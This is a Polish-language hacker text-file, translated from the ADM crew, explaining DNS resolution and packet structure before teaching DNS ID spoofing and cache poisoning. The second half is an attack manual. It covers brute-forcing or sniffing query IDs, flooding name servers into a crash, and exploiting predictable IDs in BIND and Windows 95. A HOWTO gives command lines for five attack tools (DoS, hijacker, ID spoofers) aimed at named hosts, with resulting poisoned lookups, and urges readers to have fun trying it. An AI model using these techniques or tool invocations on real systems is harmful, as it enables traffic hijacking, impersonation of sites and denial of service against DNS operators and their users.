DNS Spoof

//-->

                      ___      ______      _       _

                    /        |   _      |     /  |

                   |  /   |  |  |    |  |   _/   |

                   | |___| |  |  |_ /  |  |   _/   |

..oO  THE          |  ---  |  |       /   |  |   |  |         CreW Oo..

                   '''   '''   '''''''    ''''   ''''        

                               prezentuje

                            DNS ID Hacking                    

                          (a nawet wiecej !!)

                      w kolorze i z obrazkami )

                  (ale za to bez polskich literek  )

Tlumaczenie: sh4d0w (5h4d0w@iname.com) 


--[1]-- Co to jest DNS ID Hacking? 

w00w00! 
Czesc! Pewnie zastanawiacie sie co to takiego jest ten DNS ID Hacking 
(albo Spoofing jak kto woli). DNS ID Hacking nie jest tak po prostu zwykla 
metoda hackingu / spoofingu. Wszystko opiera sie na slabosci protokolu DNS. 
Mowiac wprost DNS ID hack/spoof jest bardzo skuteczny i efektywny poniewaz nie 
istnieje generacja demonow DNS, ktore sa w stanie sie przed nim bronic (chodzi 
tu takze o WinNT!) 


--[1.1]-- Wyjasnienie mechanizmu dzialania protokolu DNS 

Najpierw musicie wiedziec jak dziala DNS. Wyjasnione to beda tylko 
najwazniejsze fakty ze specyfikacji tego protokolu. Zeby zrozumiec to w pelni 
bedziemy musieli przesledzic droge pakietu z zapytaniem DNS od A do Z! 

1: Klient (maciek.zet.com.pl) wysyla zadanie 'rozszyfrowania' domeny 
"www.cafe.silesia.pl". Zeby znalezc kryjacy sie pod ta nazwa adres IP 
maciek.zet.com.pl uzywa dns.zet.com.pl jako serwera DNS. Popatrzmy na 
zalaczony obrazek: 

/------------------------------------- 
| 195.117.244.6 = maciek.zet.com.pl | 
| 195.117.244.12 = dns.zet.com.pl | 
| format: | 
| ADRES_IP:PORT->ADRES_IP:PORT | 
| np: | 
|195.117.244.6:1999->195.117.244.12:53| 

-------------------------------------/ 
... 
gethosbyname("www.cafe.silesia.pl"); 
... 

[maciek.zet.com.pl] [dns.zet.com.pl] 
195.117.244.6:1999 --->[?www.cafe.silesia.pl]------> 195.117.244.12:53 

Tu widzimy nasze polecenie 'rozszyfrowania' nazwy idace z portu 1999 klienta, 
do portu 53 serwera dns. 

[UWAGA: DNS jest zawsze na porcie 53] 

Teraz, gdy dns.zet.com.pl otrzymalo polecenie od maciek.zet.com.pl, moze 
zaczac probowac 'odkryc' jaki IP kryje sie pod nazwa www.cafe.silesia.pl 
Popatrzmy ... 

[dns.zet.com.pl] [ns.internic.net] 
195.117.244.12:53 -------->[dns?www.cafe.silesia.pl]----> 198.41.0.4:53 


dns.zet.com.pl pyta ns.internic.net, ktora maszyna jest 'najwyzszym' (mozna 
powiedziec najblizszym) serwerem nazw (=serwerem dns) dla www.cafe.silesia.pl. 
Jesli ns.internic.net nie zna IP tego serwera to przesyla nam adres serwera 
nazw, ktory ma autoryzacje w domenie '.pl' . 

[UWAGA: 
pytamy internic bo moze on miec juz to zadanie w swoim cache 
(tzn ktos o to pytal niedawno i jeszcze nie otrzymal odpowiedzi lub otrzymal 
ja a bylo to w na tyle niedlugim odstepie czasu ze internic potrafi udzielic 
nam automatycznie tej samej)] 

[ns.internic.net] [dns.zet.com.pl] 
198.41.0.4:53 ------>[IP dnsa dla .pl to 192.36.125.2]------> 195.117.244.12:53 

Tu mozemy zobaczyc ze ns.internic.net odpowiedzialo dns.zet.com.pl (ktory jest 
serwerem nazw majacym autoryzacje w domenie zet.com.pl) ze serwer nazw majacy 
autoryzacje w domenie '.pl' ma IP 192.36.125.2 [nazwijmy go ns.dla.pl]. Teraz 
nasz dns.zet.com.pl zapyta ns.dla.pl o adres IP www.cafe.silesia.pl, ale 
zapytany oczywiscie nie moze udzielic informacji na zadany temat wiec przesyla 
zadanie do dnsa, ktory posiada autoryzacje w domenie silesia.pl. 


[dns.zet.com.pl] [ns.dla.pl] 
195.117.244.12:53 ------>[?www.cafe.silesia.pl]-----> 192.36.125.2:53 

odpowiedz z ns.dla.pl 

[ns.dla.pl] [dns.zet.com.pl] 
192.36.125.2:53 ------>[ns dla silesia.pl to 157.158.1.3]---> 195.117.244.12:53 

Teraz mamy adres maszyny majacej autoryzacje w "silesia.pl" (nazwijmy ja 
ns1.silesia.pl) . Wysylamy do niej to samo zadanie ... 

[dns.zet.com.pl] [ns1.silesia.pl] 
195.117.244.12:53 ------>[?www.cafe.silesia.pl]-----> 157.158.1.3:53 

Lecz tu sytuacja sie powtarza (!) 

[ns1.silesia.pl] 
157.158.1.3:53 ------> [ns dla cafe.silesia.pl [dns.zet.com.pl] 
to 212.160.152.240] ----> 195.117.244.12:53 

No wreszcie! Teraz wiemy jaki adres IP ma autoryzacje w domenie 
'cafe.silesia.pl' [ niech nazywa sie dns.cafe.silesia.pl]. Teraz mozemy 
wreszcie zapytac jaki jest IP maszyny www [ czyli www.cafe.silesia.pl ;-)] 

[dns.zet.com.pl] [dns.cafe.silesia.pl]] 
195.117.244.12:53 ------>[?www.cafe.silesia.pl]----> 212.160.152.240:53 

I nareszcie mamy odpowiedz!! 

[dns.cafe.silesia.pl] 
212.160.152.240:53 ------->[www.cafe.silesia.pl [dns.zet.com.pl] 
== 212.160.152.238] ----> 195.117.244.12:53 



Super, odpowiedz jest wiec mozemy ja skierowac do naszego klienta czyli 
maciek.zet.com.pl 

[dns.zet.com.pl] 
195.117.244.12:53 ------->[www.cafe.silesia.pl 
== 212.160.152.238] ----> [maciek.zet.com.pl] 
195.117.244.6:1999 


Hehe teraz maciek.zet.com.pl zna IP www.cafe.silesia.pl :) 

A teraz wyobrazmy sobie ze chcemy poznac nazwe maszyny majac jej IP. Zeby to 
zrobic, trzeba pokombinowac troche inaczej bo IP musi byc przetransformowane: 

np. 
100.20.40.3 stanie sie 3.40.20.100.in-addr.arpa 

UWAGA!! Ta metoda stosuje sie tylko do zadan 'odkrywania' adresu IP (tzw. 
reverse DNS) 

Sprobujmy rozpatrzyc to w praktyce: gdy bierzemy IP www.cafe.silesia.pl 
(212.160.152.238 albo "238.152.160.212.in-addr.arpa" po przetlumaczeniu na 
zrozumialy dla DNS format) 

... 
gethostbyaddr("212.160.152.238"); 
... 

[maciek.zet.com.pl] 
195.117.244.6:2600 ----->[?238.152.160.212.in-addr.arpa] 
----->[dns.zet.com.pl] 
195.117.244.12:53 


Wyslalismy zadanie do naszego 'najblizszego' serwera nazw (dns.zet.com.pl) 

[dns.zet.com.pl] 
195.117.244.12:53 ----->[?238.152.160.212.in-addr.arpa] 
------>[ns.internic.net] 
198.41.0.4:53 



ns.internic.net wysle nam IP maszyny, ktora ma autoryzacje w 212.in-addr.arpa 

. 

[ns.internic.net] 
198.41.0.4:53 ----->[DNS dla 212.in-addr.arpa 
to 192.36.125.2] ----> [dns.zet.com.pl] 
195.117.244.12:53 



Teraz dns.zet.com.pl zada to samo pytanie pod wskazany wczesniej adres 
(czyli 192.36.125.2 ) 

[dns.zet.com.pl] [ns.dla.pl] 
195.117.244.12:53 ----->[?238.152.160.212.in-addr.arpa]------> 192.36.125.2:53 

i tak dalej ... 
W praktyce mechanizm jest prawie taki sam jak w przypadku 'rozszyfrowywania' 
nazwy (domeny) 

Mam nadzieje ze zrozumieliscie jak dziala DNS. Teraz przyjrzymy sie blizej 
formatowi pakietow DNS 

--[1.2]-- pakiet DNS 

Tak wyglada pakiet DNS: 

+---------------------------+---------------------------+ 
| ID (o to tu chodzi | flagi | 
+---------------------------+---------------------------+ 
| liczba pytan | liczba odpowiedzi | 
+---------------------------+---------------------------+ 
| numer certyfikujacy RR | numer uzupelniajacy RR | 
+---------------------------+---------------------------+ 
| | 

PYTANIE 
| | 
+-------------------------------------------------------+ 
| | 

ODPOWIEDZ 
| | 
+-------------------------------------------------------+ 
| | 

Reszta itp.. bez znaczenia 
| | 
+-------------------------------------------------------+ 

--[1.3]-- Struktura pakietu DNS 


__ID__ 

ID pozwala nam zidentyfikowac poszczegolne pakiety DNS. Poniewaz wymiana 
informacji miedzy serwerami nazw nastepuje z portu 53 do portu 53, co wiecej w 
tym samym czasie moze nadejsc do odbiorcy wiecej niz jedno zadanie, wiec ID 
jest jedynym sposobem pozwalajacym rozroznic pomiedzy roznymi zadaniami DNS. 
Wiecej powiemy o tym pozniej ... 

__flagi__ 

Ta sekcja jest podzielona na kilka mniejszych grup: 

4 bity 3 bity (zawsze 0) 
| | 
| | 
[QR | opcode | AA| TC| RD| RA | zero | rcode ] 
| 
| |___|___|___| |______ 4 bity 
| | 
| |_ 1 bit 
1 bit 

QR = Jesli bit QR = 0, znaczy to, ze pakiet zawiera pytanie, jesli jest 
inaczej jest on odpowiedzia. 

opcode = Wartosc wynosi 0 dla normalnego zadania, 1 dla zapasowego, 2 dla 
istniejacego (nie musimy znac tych wszystkich trybow). 

AA = Jesli rowna sie 1, mowi nam to, ze serwer nazw ma dla nas ostateczna 
odpowiedz. 


TC = Bez znaczenia. 

RD = Jesli ta flaga wynosi 1, oznacza to ze chodzi o "Przekazanie 
Zadania", np gdy maciek.zet.com.pl prosi dns.zet.com.pl o 
'rozszyfrowanie' nazwy (czyli podanie IP maszyny o tej nazwie), 
flaga mowi DNSowi zeby owo zadanie 'wzial na siebie'. 


RA = Jesli jest ustawione na 1, odbiorca wnioskuje ze przekazanie jest 
mozliwe. Bit rowna sie 1 w odpowiedzi od serwera nazw, gdy 
akceptuje on 'przekazanie'. 

Zero = Tutaj sa trzy zera... 

rcode = Zawiera zwrotne komunikaty o bledach zwiazanych z zapytaniem 
skierowanym do DNSa, 0 znaczy "nie ma bledu", 3 znaczy "blad nazwy" 

Ostatnie 2 flagi nie maja dla nas zadnego znaczenia. 

ZAPYTANIE DNS : 

Taki jest format zapytania DNS : 

+-----------------------------------------------------------------------+ 
| nazwa | 
+-----------------------------------------------------------------------+ 
| rodzaj zapytania | typ zapytania (2) | 
+--------------------------------+--------------------------------------+ 

Struktura nazwy wyglada tak: 

przyklad: 
www.cafe.silesia.pl bedzie: [3|w|w|w|4|c|a|f|e|7|s|i|l|e|s|i|a|2|p|l|0] 
w przypadku adresu IP bedzie tak samo  

44.33.88.123.in-addr.arpa bedzie: 
[2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0] 
[UWAGA]: istnieje format kompresji, ale nie bedziemy go uzywac. 


rodzaj zapytania: 

Tutaj sa wartosci, ktorych bedziemy uzywac najczesciej: 
[UWAGA]: Istnieje ponad 20 roznych wartosci (!) a ja mam dosc pisania ) 

nazwa wartosc 
A | 1 | Adres IP ( chcemy IP na podstawie nazwy) 
PTR | 12 | Wskaznik (Pointer) ( chcemy nazwe, majac IP ) 



typ zapytania: 

Wartosci sa takie same jak w przypadku rodzaju zapytania. 
(nie wiem, czy jest to prawda, ale celem nie jest nauczenie was protokolu 
DNS od A do Z, jesli chcecie bardziej zglebic ten temat powinniscie zapoznac 
sie z RFC od 1033 do 1035 i 1037, tutaj celem jest ogolna wiedza do 
zastosowania w praktyce!!). 



ODPOWIEDZ DNS: 

Odpowiedz ma format, ktory nazywamy RR. No ale niewazne  

Tak wyglada format odpowiedzi (czyli RR) 

+------------------------------------------------------------------------+ 
| nazwa domeny | 
+------------------------------------------------------------------------+ 
| typ | klasa | 
+----------------------------------+-------------------------------------+ 
| TTL (time to live - czas zycia) | 
+------------------------------------------------------------------------+ 

| dlugosc dostepnej informacji | | 
|---------------------------------+ | 
| 
dostepna informacja | 

+------------------------------------------------------------------------- 


nazwa domeny: 

Nazwa domeny w formacie takim samym jak w przypadku czesci pytania 
'rozszyfrowania' domeny www.cafe.silesia.pl. Flaga "nazwa domeny" 
bedzie zatem zawierac [3|w|w|w|4|c|a|f|e|7|s|i|l|e|s|i|a|2|p|l|0] 

typ: 

Ta flaga jest taka sama jak w przypadku 'typu zapytania' w czesci "PYTANIE" 
pakietu. 

klasa: 
Flaga klasy rowna sie 1 w przypadku informacji internetowej. 

czas zycia: 
Ta flaga pokazuje (w sekundach) czas 'zycia' informacji w cache (kaszu) 
serwera nazw. 

dlugosc dostepnej informacji: 
Jak sama nazwa wskazuje. Podawana w bajtach. (np jesli ta flaga ma wartosc 4 
to znaczy, ze dostepna informacja zawiera sie w 4 bajtach) 


dostepna informacja: 
W naszym przypadku (zapytanie o IP podanej domeny - czyli typ 1[A]) serwer 
nazw podaje w tym miejscu IP 

Pokaze wam pewnien przyklad, ktory wytlumaczy to lepiej: 


Oto, co dzieje sie, gdy dns.zet.com.pl pyta dns.cafe.silesia.pl o adres IP 
maszyny o domenie www.cafe.silesia.pl 


dns.zet.com.pl:53 ---> [?www.cafe.silesia.pl] ----> dns.cafe.silesia.pl:53 

+---------------------------------+--------------------------------------+ 
| ID = 1999 | QR = 0 opcode = 0 RD = 1 | 
+---------------------------------+--------------------------------------+ 
| liczba pytan = htons(1) | liczba odpowiedzi = 0 | 
+---------------------------------+--------------------------------------+ 
| numer certyfikujacy RR = 0 | numer uzupelniajacy RR = 0 | 
+---------------------------------+--------------------------------------+ 

+------------------------------------------------------------------------+ 
| nazwa = [3|w|w|w|4|c|a|f|e|7|s|i|l|e|s|i|a|2|p|l|0] | 
+------------------------------------------------------------------------+ 
| rodzaj zapytania = htons(1) | typ zapytania = htons(1) | 
+---------------------------------+--------------------------------------+ 

Tak to wyglada w przypadku pytania. 

Teraz przyjrzyjmy sie odpowiedzi od dns.cafe.silesia.pl 

dns.cafe.silesia.pl:53 -->[IP www.cafe.silesia.pl 
to 212.160.152.238] --> dns.zet.com.pl:53 


+---------------------------------+-----------------------------------------+ 
| ID = 1999 | QR=1 opcode=0 RD=1 AA =1 RA=1 | 
+---------------------------------+-----------------------------------------+ 
| liczba pytan = htons(1) | liczba odpowiedzi = htons(1) | 
+---------------------------------+-----------------------------------------+ 
| numer certyfikujacy RR = 0 | numer uzupelniajacy RR = 0 | 
+---------------------------------+-----------------------------------------+ 
+---------------------------------------------------------------------------+ 
| nazwa = [3|w|w|w|4|c|a|f|e|7|s|i|l|e|s|i|a|2|p|l|0] | 
+---------------------------------------------------------------------------+ 
| rodzaj zapytania = htons(1) | typ zapytania = htons(1) | 
+---------------------------------------------------------------------------+ 
+---------------------------------------------------------------------------+ 
| name domeny = [3|w|w|w|4|c|a|f|e|7|s|i|l|e|s|i|a|2|p|l|0] | 
+---------------------------------------------------------------------------+ 
| typ = htons(1) | klasa = htons(1) | 
+---------------------------------------------------------------------------+ 
| czas zycia = 999999 | 
+---------------------------------------------------------------------------+ 
|dlugosc dost. inf. = htons(4)|dost. informacja=inet_addr("212.160.152.238")| 
+---------------------------------------------------------------------------+ 

Yah! To wszystko na dzisiaj ) 

Przeanalizujmy: 
W odpowiedzi QR = 1 bo jest to odpowiedz  
AA = 1 bo serwer nazw ma autoryzacje w swojej domenie 
RA = 1 bo przekazanie bylo i jest mozliwe 

Doobrze =) Mam nadzieje, ze zrozumieliscie bo bedzie tego potrzebowali do 
kolejnych rzeczy 

--[2.0]-- DNS ID hack/spoof 

Teraz przyszedl czas zeby wytlumaczyc jasno co to jest DNS ID hacking/spoofing. 
Jak tlumaczylem wczesniej, dla demona DNS jedynym sposobem odroznienia 
poszczegolnych pytan/odpowiedzi od siebie jest flaga ID pakietu. Popatrzcie na 
ten przyklad: 


dns.zet.com.pl:53 ----->[?www.cafe.silesia.pl] ------> dns.cafe.silesia.pl:53 

Wiec musisz tylko spoofnac IP dns.cafe.silesia.pl i przeslac odpowiednia 
spreparowana informacje przed dns.cafe.silesia.pl do dns.zet.com.pl! 


dns.zet.com.pl <------- . . . . . . . . . . . dns.cafe.silesia.pl 
| 
|<--[IP www.cafe.silesia.pl to 1.2.3.4]<-- heh.chakier.org 



Ale w praktyce musisz zgadnac dobre ID . Jesli jestes w LANie z 
'oszukiwanym' serwerem mozesz snifnac (podsluchac) to ID i odpowiedziec przed 
wlasciwym serwerem nazw (w Sieci Lokalnej jest to dosc proste ) 

Jesli chcesz to zrobic zdalnie to nie masz zbyt wielkiego wyboru. Mozesz 
zastosowac tylko 4 podstawowe metody: 

1.) Losowo przetestowac wszystkie prawdopodobne wartosci flagi ID. Musisz 
odpowiedziec przed dnsem! (tutaj dns.cafe.silesia.pl). Ta metoda jest 
przestarzala chyba ze baardzo chcesz znac ID ... albo jesli masz inny 
argument na okolicznosc jej stosowania 

2.) Wyslac troche zapytan DNS (200 albo 300) zeby zwiekszyc szanse 
pozniejszego trafienia na dobre ID 

3.) Zfloodowac (zalac zadaniami) DNS zeby przestal wykonywac swoje funkcje. 
Serwer nazw padnie i pokaze nastepujacy komunikat! 

>> Oct 06 05:18:12 ADM named[1913]: db_free: DB_F_ACTIVE set - ABORT 
teraz demon named jest zepsuty (przynajmniej na jakis czas) 

4.) Albo mozesz skorzystac z dziury w BIND znalezionej przez SNI (Secure 
Networks, Inc.) - chodzi o przewidywanie ID (za chwile to omowimy) 


############# Dziura w Windows ID ################### 

Znalazlem powazna dziure w Windows 95 [tez mi nowosc ;-> - przyp. sh4d0w] 
(nie testowalem tego na WinNT), wyobrazmy sobie serwer nazw na Win 95. 
Wartosc ID Windowsa jest bardzo latwo przewidziec bo domyslnie wynosi ona "1" 
:))), albo "2" w przypadku drugiego zapytania w tym samym czasie. 


################ Dziura w BINDzie ##################### 

Zostala ona odkryta przez SNI jak wczesniej wspomnialem. W praktyce wartosc 
flagi ID DNSa mozna dosc latwo przewidziec - trzeba tylko 'podejsc' serwer 
zeby osiagnac swoj cel. Pozwolcie, ze wytlumacze ... 

DNS uzywa losowej wartosci ID na poczatku ale potem (dla nastepnych zadan) juz 
tylko ja zwieksza ... =))) 

Latwo jest to wykorzystac. 
Tu jest sposob: 


1. Trzeba miec mozliwosc podsluchania wiadomosci przychodzacych do jakiegos 
DNSa (w naszym przykladzie dns.olympus.com.pl). 

2. Zadasz od hermes.sgh.waw.pl zeby 'rozszyfrowal' (costam).olympus.com.pl. 
hermes.sgh.waw.pl przekazuje zadanie do dns.olympus.com.pl 


hermes.sgh.waw.pl ---> [?(cos).olympus.com.pl 
ID = 444] ---> dns.olympus.com.pl 


3. Teraz znasz ID wiadomosci od hermes.sgh.waw.pl i wiesz mniej wiecej w 
jakiego przedzialu liczbowego mozna uzyc (tutaj ID = 444). 

4. Teraz ty skieruj do hermesa swoje zapytanie - np. o www.microsoft.com 

(ty) ---> [?www.microsoft.com] ---> hermes.sgh.waw.pl 

hermes.sgh.waw.pl --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com 

5. Zasyp serwer nazw hermes.sgh.waw.pl wiadomosciami o ID = 444 i wiekszym. 

ns.microsoft.com-->[www.microsoft.com = 1.1.1.1 ID=444]--> hermes.sgh.waw.pl 
ns.microsoft.com-->[www.microsoft.com = 1.1.1.1 ID=445]--> hermes.sgh.waw.pl 
ns.microsoft.com-->[www.microsoft.com = 1.1.1.1 ID=446]--> hermes.sgh.waw.pl 
ns.microsoft.com-->[www.microsoft.com = 1.1.1.1 ID=447]--> hermes.sgh.waw.pl 
ns.microsoft.com-->[www.microsoft.com = 1.1.1.1 ID=448]--> hermes.sgh.waw.pl 
ns.microsoft.com-->[www.microsoft.com = 1.1.1.1 ID=449]--> hermes.sgh.waw.pl 



Oczywiscie nie mamy r00ta na ns.microsoft.com - spoofujemy tylko jego adres. 
Teraz wiecie, ze wartosci ID DNSow sa przewindywalne i wylacznie rosna. 
Zasypujemy hermesa spreparowanymi wiadomosciami i ID 444+  

*** po to wlasnie jest ADMsnOOfID. 


Jest jeszcze jedna droga zeby wykorzystac ta dziure - nawet bez roota na 
jakims DNSie. 

Mechanizm jest prosty. Oto wytlumaczenie 

Wysylamy hermesowi zadanie odkrycia IP *.olympus.com.pl 


(ty) ----------[?(cos).olympus.com.pl] -------> hermes.sgh.waw.pl 

Oczywiscie hermes przesyla zadanie do dns.olympus.com.pl (przypomne ze w tym 
przykladzie nie mamy tam roota ani nie jestesmy w stanie 'podsluchac' ID) 
. 
Nic nowego, ale odtad zaczyna byc ciekawie. 

Od tego momentu zasypujemy hermes.sgh.waw.pl spoofowanymi odpowiedziami (z IP 
dns.olympus.com.pl) z flaga ID od 100 do 110... 


(spoof) ----[(cos).olympus.com.pl to 1.2.3.4 ID=100] --> hermes 
(spoof) ----[(cos).olympus.com.pl to 1.2.3.4 ID=101] --> hermes 
(spoof) ----[(cos).olympus.com.pl to 1.2.3.4 ID=102] --> hermes 
(spoof) ----[(cos).olympus.com.pl to 1.2.3.4 ID=103] --> hermes 
..... 

Po tym pytamy hermesa jakie (costam).olympus.com.pl ma IP. 

Jesli hermes.sgh.waw.pl da nam IP (costam).olympus.com.pl znaczy to, ze 
znalezlismy dobre ID W innym przypadku musimy powtarzac ataki do chwili 
znalezienia wlasciwego ID. Trwa to troche dlugo ale daje efekty. I nic nie 
zabrania ci testowac tego na kumplach  

Tak dziala ADMnOg00d  

------------------------------- 



############################################ 

Tu znajdziecie 5 programow 
ADNdnsfuckr - bardzo prosty atak DoS - pozwala zablokowac DNSa 
ADMsniffID - posnifuj w LANie i odpowiedz przed wlasciwym NSem 
ADMsnOOfID - DNS ID spoofer (musisz byc rootem na serwerze nazw) 
ADMnOg00d - 'przewidywacz' DNS ID (nie musisz byc rootem na NSie) 
ADMkillDNS - bardzo prosty spoofer DNS 

Dobrej zabawy!!  
UWAGA: Mozecie znalezc zrodla tych programow na ftp.janova.org/pub/ADM. 
Musicie u siebie zainstalowac libpcap 
przed jakakolwiek kompilacja programow 
ADMID [ nie dotyczy nowych linuxow: rh >>5.1 , debian >>2.0 , slackware 
>>3.6 - przyp sh4d0w ] 


###### dodatek specjalny - HOWTO ######### 

1. ADMdnsfuckr 

popularny atak DoS - b. prosty w uzyciu  

sposob uzycia: 

$ ./ADMdnsfuckr 

np 

$ ./ADMdnsfuckr ns1.pse.pl 


2. ADMsniffID 

Jest to (jak mowi sam autor) DNS hijacker . Oczywiscie potrzeba roota. Do 
uzycia tylko w LANie (tzn atakowany serwer nazw jest w tej samej sieci 
lokalnej co ty) 

# ./ADMsniffID [ typ: 
1 lub 12 ] 

pamietacie? 
typ 1 = A 
typ 12 = PTR 

np. 

# ./ADMsniffID eth0 31.3.3.7 hax0rs.from.hackingpl.pl 12 
^typ PTR 

Wiec jesli ktos w sieci zrobi "nslookup to bedzie mial: 

[root]#nslookup 1.2.3.4 
Server: localhost 
Address: 127.0.0.1 

Name: hax0rs.from.hackingpl.pl 
Address: 1.2.3.4 


3: --= ADMsnOOfID =-- 

1) na poczatek musicie miec roota na serwerze nazw, ktory ma autoryzacje w 
domenie (np shok.janova.org ma autoryzacje w *.janowa.org) 

ADMsnOOfID pomoze wam przewidziec ID pakietu DNS (ale musicie miec roota na 
dnsie albo mozliwosc snifowania pakietow przychodzacych do niego) 

sposob uzycia: 

# ./ADMsnOOfID 
dnsa> 
spoofowanej domenie lub obszarze IP> 

np: 

# ./ADMsnOOfID ppp0 hermes.sgh.waw.pl janova.org shok.janova.org 12 
jablonovo.to.jest.to 195.117.80.70 ns4.polbox.pl 

jesli teraz zapytasz hermesa o 195.117.80.70 bedziesz mial: 

[root]#nslookup 195.117.80.70 hermes.sgh.waw.pl 
Server: hermes.sgh.waw.pl 
Address: 148.81.200.10 

Name: jablonovo.to.jest.to 
Address: 195.117.80.70 

[root]# 

Uzywamy ns4.polbox.pl bo ma on autoryzacje w 195.117.80.* . Zeby sprawdzic 
taka rzecz nalezy zrobic cos takiego: 

[root]#host -t NS 80.117.195.in-addr.arpa 
80.117.195.in-addr.arpa name server NS.POLBOX.PL 
80.117.195.in-addr.arpa name server NS4.POLBOX.PL 
80.117.195.in-addr.arpa name server NS1.PSE.PL 
[root]# 

zeby wiedziec ktory serwer (lub ktore serwery) maja autoryzacje 
w powiedzmy *.polbox.pl robimy tak: 

[root]#host -t NS polbox.pl 
polbox.pl name server ns.polbox.pl 
polbox.pl name server ns4.polbox.pl 
polbox.pl name server ns1.pse.pl 
[root]# 

UWAGA: to moze sie zmieniac!!! Mozesz dostac na poczatku ns1 a kiedy wyslesz 
drugie zadanie dostajesz ns4..  

Hoo, jestem dzis bardzo mily i dam wam jeszcze jeden przyklad ... na spoof 
typu 1 

# ./ADMsnOOfID ppp0 hermes.sgh.waw.pl janova.org shok.janova.org 1 
zul.ibb.waw.pl 31.3.3.7 jozek.ibb.waw.pl 

no wiec.. 

[root]#nslookup zul.ibb.waw.pl hermes.sgh.waw.pl 
Server: hermes.sgh.waw.pl 
Address: 148.81.200.10 

Non-authoritative answer: 
Name: zul.ibb.waw.pl 
Address: 31.3.3.7 

[root]# 

Ok to wszystko o ADMsnOOfID  


4: ADMnOg00d 

Ttutaj nie potrzebujecie roota na zadnym DNSie ... 
Ale i tak musicie miec roota GDZIES (np u siebie w domu ;->) 

To brutalny cracker DNS ID !! 

sposob uzycia: 

# ./ADMnoG00D 
[ID] 

np: 

# ./ADMnOg00d ppp45.pierdziszewo.tpnet.pl ix.renet.com.pl renet.com.pl 
ledum.ibb.waw.pl 12 jestem.wiesniakiem.mow.mi.elvis 212.87.28.144 
ns2.renet.com.pl 7000 

(zaczynam od ID 7000 bo znam aktualne ID ledum.ibb.waw.pl) 

Uzywam ix.renet.com.pl i domeny renet.com.pl tylko po to, zeby znalesc ID 
wiec.. Jesli znajdziemy ID mozemy wyslac spoof wlasciwy. 

Jesli sie uda to mamy: 

[root@shok root1]# nslookup 212.87.28.144 ledum.ibb.waw.pl 
Server: ledum.ibb.waw.pl 
Address: 212.87.28.200 

Name: jestem.wiesniakiem.mow.mi.elvis 
Address: 212.87.28.144 

Tak, znowu bede mily i dam wam jeszcze jeden przyklad spoofu typ 1 

# ./ADMnOg00d ppp45.pierdziszewo.tpnet.pl ix.renet.com.pl renet.com.pl 
ledum.ibb.waw.pl 1 m45t4ch.renet.com.pl 2.6.0.0 ns2.renet.com.pl 7000 

pozniej.. 
# nslookup m45t4ch.renet.com.pl ledum.ibb.waw.pl 
... 
Server: ledum.ibb.waw.pl 
Address: 212.87.28.200 

Non-authoritative answer: 
Name: m45t4ch.renet.com.pl 
Address: 2.6.0.0 


5: ADMkillDNS 

ADMkillDNS to BRUTALNY spoofer ID, najwczesniej napisane przeze mnie narzedzie 
do DNS ID spoofingu 

(napisane: Ju 97ŕ) 

Zalaczona pomoc jest bardzo kompletna i nie ma potrzeby o tym wiecej mowic 

{koniec}